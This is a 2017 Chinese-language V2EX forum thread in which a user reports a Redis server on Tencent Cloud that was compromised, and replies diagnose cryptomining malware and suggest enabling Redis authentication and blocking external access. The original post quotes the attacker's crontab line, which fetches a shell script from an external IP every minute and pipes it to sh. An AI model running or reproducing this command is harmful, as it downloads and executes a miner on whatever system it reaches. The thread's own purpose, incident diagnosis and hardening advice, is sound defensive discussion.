首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
PickMio
V2EX  ›  程序员

租的腾讯云主机安装 redis 后没几天, 发现多了一条记录, 是不是被入侵了...

  •   
  •   PickMio · 2017-07-06 17:03:32 +08:00 · 4401 次点击
    这是一个创建于 2689 天前的主题,其中的信息可能已经有所发展或是发生改变。

    */1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

  • curl
  • Redis
  • usr
  • fssl
    12 条回复    2017-07-07 02:30:42 +08:00
    weiweiwitch
        1
    weiweiwitch  
       2017-07-06 17:08:26 +08:00
    redis 启用密码了吗,没有启用的话,很容易被入侵。
    killerv
        2
    killerv  
       2017-07-06 17:14:27 +08:00
    redis 最好限制外网访问+启用认证
    expy
        3
    expy  
       2017-07-06 17:14:46 +08:00
    被挖矿了吧 233
    shakoon
        4
    shakoon  
       2017-07-06 17:18:17 +08:00
    是被入侵了,该机器被用作了挖矿的肉鸡
    PickMio
        5
    PickMio  
    OP
       2017-07-06 17:19:05 +08:00
    @expy #3 貌似是的, 下载了一个 minerd 程序..
    PickMio
        6
    PickMio  
    OP
       2017-07-06 17:19:21 +08:00
    @weiweiwitch #1 没设置...
    shakoon
        7
    shakoon  
       2017-07-06 17:20:03 +08:00   ❤️ 1
    解决可参考这个 http://www.centoscn.com/CentosBug/osbug/2016/0724/7671.html
    PickMio
        8
    PickMio  
    OP
       2017-07-06 17:41:41 +08:00
    @shakoon #7 好, 我看看
    evlos
        9
    evlos  
       2017-07-06 17:47:36 +08:00 via iPhone
    看一下那个人的挖矿账号累计挖到了 200 多 XMR,差不多一万多人民币
    Itanium
        10
    Itanium  
       2017-07-06 17:56:01 +08:00
    现在 CPU 挖矿效率很高吗?
    realpg
        11
    realpg  
       2017-07-06 18:23:30 +08:00 via Android
    你一定是用了 centos
    msg7086
        12
    msg7086  
       2017-07-07 02:30:42 +08:00
    不要跟我说你 redis 给的权限能大到任意改写系统文件哦?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   965 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 128ms · UTC 22:24 · PVG 06:24 · LAX 14:24 · JFK 17:24
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.